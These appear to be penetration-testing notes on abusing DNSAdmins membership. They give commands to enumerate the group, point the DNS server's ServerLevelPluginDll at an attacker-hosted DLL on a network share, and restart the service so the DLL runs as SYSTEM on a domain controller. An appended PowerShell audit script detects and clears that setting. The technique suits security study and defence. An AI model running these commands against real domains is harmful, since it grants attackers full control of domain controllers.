DNS Administrators

DNS Administrators (members of the DNSAdmins group) can make dns.exe load an arbitrary DLL as a server-level plugin. Since dns.exe runs as SYSTEM, any code in that DLL also runs as SYSTEM on the DNS server, which is usually a domain controller.

You will also need the privileges necessary to restart the DNS service, because the DLL is only loaded when the service starts.

Attacking DNS Admins

Enumerate DNS Admins

# PowerView
Get-NetGroupMember -GroupName "DNSAdmins"

#Ad Module
Get-ADGroupMember -Identity "DNSAdmins"
  • From Linux

# pywerview.py
./pywerview.py get-netgroupmember -u <user> -p <pass> --dc-ip <ip> --groupname "DNSAdmins"

Exploitation

With the privileges of a DNS Admin, configure the DLL using dnscmd.exe (requires RSAT DNS).

  • Host a dll on a share and use it as a plugin

# using dnscmd.exe
dnscmd dcorp-dc /config /serverlevelplugindll \\<share_ip>\dll\evil.dll 

# using DNSServer Module
$dnsettings = Get-DnsServerSetting -ComputerName <dc> -Verbose -All

$dnsettings.ServerLevelPluginDll = "\\<share_ip>\dll\evil.dll"

Set-DnsServerSetting -InputObject $dnsettings -ComputerName <dc> -Verbose
  • Then restart the DNS service; dns.exe loads the DLL on startup and runs it as SYSTEM.

sc \\<dc> stop dns
sc \\<dc> start dns
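A defender-side audit for the setting abused above, added here and not part of the original notes. It reads ServerLevelPluginDll both through the DNSServer module and directly from the DNS service's registry parameters, and lists who can change it; it assumes the DNSServer and ActiveDirectory RSAT modules are installed and uses the page's own dcorp-dc as a placeholder server name.

```powershell
# Audit the two conditions this technique depends on: a configured plugin DLL
# and membership of the group allowed to set it. Added example, not from the notes.
param([string]$DnsServer = "dcorp-dc")   # placeholder; set to your DNS server / DC

$findings = @()

# 1. Server-level plugin DLL as reported by the DNS server. Expected value: empty.
$settings = Get-DnsServerSetting -ComputerName $DnsServer -All
$plugin   = $settings.ServerLevelPluginDll
if ($plugin) {
    # A UNC path means the DLL is pulled from a share, exactly the pattern above.
    $severity = if ($plugin -like '\\*') { 'HIGH (UNC path, DLL loaded from a share)' } else { 'REVIEW' }
    $findings += "ServerLevelPluginDll is set to '$plugin' [$severity]"
}

# 2. Same value read straight from the registry on the server, so a discrepancy
#    between the stored value and the management API is visible too.
$regValue = Invoke-Command -ComputerName $DnsServer -ScriptBlock {
    (Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters' `
        -Name ServerLevelPluginDll -ErrorAction SilentlyContinue).ServerLevelPluginDll
}
if ($regValue -and $regValue -ne $plugin) {
    $findings += "Registry ServerLevelPluginDll ('$regValue') differs from API value ('$plugin')"
}

# 3. Who is able to set the value: DNSAdmins membership, resolved through nested groups.
$members = Get-ADGroupMember -Identity 'DNSAdmins' -Recursive |
    Select-Object -ExpandProperty SamAccountName
if ($members) {
    $findings += "DNSAdmins members (review each): $($members -join ', ')"
}

if ($findings.Count -eq 0) {
    "OK: no plugin DLL configured and DNSAdmins is empty on $DnsServer"
} else {
    $findings | ForEach-Object { "FINDING: $_" }
}

# Remediation uses the same mechanism the notes use to set the value (assumed to
# accept an empty string): clear it, then restart the service so the DLL is no longer loaded.
# $settings.ServerLevelPluginDll = ''
# Set-DnsServerSetting -InputObject $settings -ComputerName $DnsServer
```

Run it on a schedule from a monitoring host and alert on any FINDING line; a non-empty ServerLevelPluginDll on a domain controller is almost never legitimate.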
